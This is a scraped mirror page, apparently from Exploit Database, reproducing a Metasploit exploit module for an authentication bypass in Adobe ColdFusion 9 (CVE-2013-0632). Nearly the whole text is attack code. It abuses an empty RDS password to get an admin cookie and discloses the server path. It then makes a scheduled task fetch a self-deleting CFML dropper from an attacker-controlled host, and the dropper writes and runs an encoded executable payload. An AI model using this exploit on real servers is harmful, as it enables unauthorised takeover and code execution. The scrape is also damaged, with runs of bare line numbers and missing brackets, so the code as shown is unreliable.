Adobe ColdFusion 9 – Administrative Authentication Bypass (Metasploit)

Exploit Database
121 阅读

作者： Metasploit

日期： 2013-12-11
类别：
- remote
平台：
- multiple
来源：https://www.exploit-db.com/exploits/30210/

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

116

117

118

119

120

121

122

123

124

125

126

127

128

129

130

131

132

133

134

135

136

137

138

139

140

141

142

143

144

145

146

147

148

149

150

151

152

153

154

155

156

157

158

159

160

161

162

163

164

165

166

167

168

169

170

171

172

173

174

175

176

177

178

179

180

181

182

183

184

185

186

187

188

189

190

191

192

193

194

195

196

197

198

199

200

201

202

203

204

205

206

207

208

209

210

211

212

213

214

215

216

217

218

219

220

221

222

223

224

225

226

227

228

229

230

231

232

233

234

235

236

237

238

239

240

241

242

243

244

245

246

247

248

249

250

251

252

253

254

255

256

257

258

259

260

261

262

263

264

265

266

267

268

269

270

271

272

273

274

275

276

277

278

279

280

281

282

283

284

285

286

287

288

289

290

291

292

293

294

295

296

297

298

299

300

301

302

303

304

305

306

307

308

309

310

311

312

313

314

315

316

# This module requires Metasploit: http//metasploit.com/download

# Current source: https://github.com/rapid7/metasploit-framework

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

include Msf::Exploit::Remote::HttpClient

include Msf::Exploit::Remote::HttpServer::HTML

include Msf::Exploit::EXE

Rank = GreatRanking

def initialize(info = {})

super(update_info(info,

'Name'=> 'Adobe ColdFusion 9 Administrative Login Bypass',

'Description' => %q{

Adobe ColdFusion 9.0, 9.0.1, 9.0.2, and 10 allows remote attackers to bypass authentication using the RDS component. Its password can

by default or by misconfiguration be set to an empty value. This allows you to create a session via the RDS login that

can be carried over to the admin web interface even though the passwords might be different. Therefore bypassing

authentication on the admin web interface which then could lead to arbitrary code execution.

Tested on Windows and Linux with ColdFusion 9.

'Author'=>

[

'Scott Buckel', # Vulnerability discovery

'Mekanismen <mattias[at]gotroot.eu>' # Metasploit module

'License' => MSF_LICENSE,

'References'=>

[

[ "CVE", "2013-0632" ],

[ "EDB", "27755" ],

[ "URL", "http://www.adobe.com/support/security/bulletins/apsb13-03.html" ]

'Privileged'=> false,

'Stance'=> Msf::Exploit::Stance::Aggressive, #thanks juan!

'Platform'=> ['win', 'linux'],

'Targets' =>

[

[ 'Windows',

{

'Arch' => ARCH_X86,

'Platform' => 'win'

}

[ 'Linux',

{

'Arch' => ARCH_X86,

'Platform' => 'linux'

}

'DefaultTarget' => 0,

'DisclosureDate'=> 'Aug 08 2013'

))

register_options(

[

OptString.new('EXTURL', [ false, 'An alternative host to request the CFML payload from', "" ]),

OptInt.new('HTTPDELAY', [false, 'Time that the HTTP Server will wait for the payload request', 10]),

], self.class)

register_advanced_options(

[

OptString.new('CFIDDIR', [ true, 'Alternative CFIDE directory', 'CFIDE'])

])

end

def check

uri = target_uri.path

#can we access the admin interface?

res = send_request_cgi({

'method' => 'GET',

'uri' => normalize_uri(uri, datastore['CFIDDIR'], 'administrator', 'index.cfm'),

})

if res and res.code == 200 and res.body.to_s =~ /ColdFusion Administrator Login/

print_good "#{peer} - Administrator access available"

else

return Exploit::CheckCode::Safe

end

#is it cf9?

res = send_request_cgi({

'method' => 'GET',

'uri' => normalize_uri(uri, datastore['CFIDDIR'], 'administrator', 'images', 'loginbackground.jpg')

})

img = Rex::Text.md5(res.body.to_s)

imghash = "596b3fc4f1a0b818979db1cf94a82220"

if img == imghash

print_good "#{peer} - ColdFusion 9 Detected"

else

return Exploit::CheckCode::Safe

end

#can we access the RDS component?

res = send_request_cgi({

'method' => 'POST',

'uri' => normalize_uri(uri, datastore['CFIDDIR'], 'adminapi', 'administrator.cfc'),

'vars_post' => {

'method' => "login",

'adminpassword' => "",

'rdsPasswordAllowed' => "1"

}

})

if res and res.code == 200 and res.body.to_s =~ /true/

return Exploit::CheckCode::Appears

else

return Exploit::CheckCode::Safe

end

def exploit

@pl = gen_file_dropper

@payload_url= ""

if datastore['EXTURL'].blank?

begin

Timeout.timeout(datastore['HTTPDELAY']) {super}

rescue Timeout::Error

end

exec_payload

else

@payload_url = datastore['EXTURL']

upload_payload

exec_payload

end

def primer

@payload_url = get_uri

upload_payload

end

def on_request_uri(cli, request)

if request.uri =~ /#{get_resource}/

send_response(cli, @pl)

end

#task scheduler is pretty bad at handling binary files and likes to mess up our meterpreter :-(

#instead we use a CFML filedropper to embed our payload and execute it.

#this also removes the dependancy of using the probe.cfm to execute the file.

def gen_file_dropper

rand_var= rand_text_alpha(8+rand(8))

rand_file = rand_text_alpha(8+rand(8))

if datastore['TARGET'] == 0

rand_file += ".exe"

end

encoded_pl= Rex::Text.encode_base64(generate_payload_exe)

print_status "Building CFML shell..."

#embed payload

shell = ""

shell += " <cfset #{rand_var} = ToBinary( \"#{encoded_pl}\" ) />"

shell += " <cffile action=\"write\" output=\"##{rand_var}#\""

shell += " file= \"#GetDirectoryFromPath(GetCurrentTemplatePath())##{rand_file}\""

#if linux set correct permissions

if datastore['TARGET'] == 1

shell += " mode = \"700\""

end

shell += "/>"

#clean up our evil .cfm

shell += " <cffile action=\"delete\""

shell += " file= \"#GetDirectoryFromPath(GetCurrentTemplatePath())##listlast(cgi.script_name,\"/\")#\"/>"

#execute our payload!

shell += " <cfexecute"

shell += " name = \"#GetDirectoryFromPath(GetCurrentTemplatePath())##{rand_file}\""

shell += " arguments = \"\""

shell += " timeout = \"60\"/>"

return shell

end

def exec_payload

uri = target_uri.path

print_status("#{peer} - Our payload is at: #{peer}\\#{datastore['CFIDDIR']}\\#{@filename}")

print_status("#{peer} - Executing payload...")

res = send_request_cgi({

'method' => 'GET',

'uri' => normalize_uri(uri, datastore['CFIDDIR'], @filename)

})

end

def upload_payload

uri = target_uri.path

@filename = rand_text_alpha(8+rand(8)) + ".cfm" #numbers is a bad idea

taskname = rand_text_alpha(8+rand(8)) #numbers is a bad idea

print_status "#{peer} - Trying to upload payload via scheduled task..."

res = send_request_cgi({

'method' => 'POST',

'uri' => normalize_uri(uri, datastore['CFIDDIR'], 'adminapi', 'administrator.cfc'),

'vars_post' => {

'method' => "login",

'adminpassword' => "",

'rdsPasswordAllowed' => "1"

}

})

unless res and res.code == 200

fail_with(Failure::Unknown, "#{peer} - RDS component was unreachable")

end

#deal with annoying cookie data prepending (sunglasses)

cookie = res.get_cookies

if res and res.code == 200 and cookie =~ /CFAUTHORIZATION_cfadmin=;(.*)/

cookie = $1

else

fail_with(Failure::Unknown, "#{peer} - Unable to get auth cookie")

end

res = send_request_cgi({

'method' => 'GET',

'uri' => normalize_uri(uri, datastore['CFIDDIR'], 'administrator', 'index.cfm'),

'cookie' => cookie

})

if res and res.code == 200 and res.body.to_s =~ /ColdFusion Administrator Login/

print_good("#{peer} - Logged in as Administrator!")

else

fail_with(Failure::Unknown, "#{peer} - Login Failed")

end

#get file path gogo

res = send_request_cgi({

'method' => 'GET',

'uri' => normalize_uri(uri, datastore['CFIDDIR'], 'administrator', 'settings', 'mappings.cfm'),

'vars_get' => {

'name' => "/CFIDE"

'cookie' => cookie

})

unless res and res.code == 200

fail_with(Failure::Unknown, "#{peer} - Mappings URL was unreachable")

end

if res.body =~ /<input type="text" maxlength="550" name="directoryPath" value="(.*)" size="40" id="dirpath">/

file_path = $1

print_good("#{peer} - File path disclosed! #{file_path}")

else

fail_with(Failure::Unknown, "#{peer} - Unable to get upload filepath")

end

print_status("#{peer} - Adding scheduled task")

res = send_request_cgi({

'method' => 'POST',

'uri' => normalize_uri(uri, datastore['CFIDDIR'], 'administrator', 'scheduler', 'scheduleedit.cfm'),

'vars_post' => {

'TaskName' => taskname,

'Start_Date' => "Nov 1, 2420",

'End_Date' => "",

'Interval' => "",

'ScheduleType' => "Once",

'Operation' => "HTTPRequest",

'ScheduledURL' => @payload_url,

'publish' => "1",

'publish_file' => "#{file_path}\\#{@filename}",

'adminsubmit' => "Submit"

'cookie' => cookie

})

unless res and res.code == 200 or res.code == 302 #302s can happen but it still works, http black magic!

fail_with(Failure::Unknown, "#{peer} - Scheduled task failed")

end

print_status("#{peer} - Running scheduled task")

res = send_request_cgi({

'method' => 'GET',

'uri' => normalize_uri(uri, datastore['CFIDDIR'], 'administrator', 'scheduler', 'scheduletasks.cfm'),

'vars_get' => {

'runtask' => taskname,

'timeout' => "0"

'cookie' => cookie

})

if res and res.code == 200 and res.body.to_s =~ /This scheduled task was completed successfully/

print_good("#{peer} - Scheduled task completed successfully")

else

fail_with(Failure::Unknown, "#{peer} - Scheduled task failed")

end

print_status("#{peer} - Deleting scheduled task")

res = send_request_cgi({

'method' => 'GET',

'uri' => normalize_uri(uri, datastore['CFIDDIR'], 'administrator', 'scheduler', 'scheduletasks.cfm'),

'vars_get' => {

'action' => "delete",

'task' => taskname

'cookie' => cookie

})

unless res and res.code == 200

print_error("#{peer} - Scheduled task deletion failed, cleanup might be needed!")

end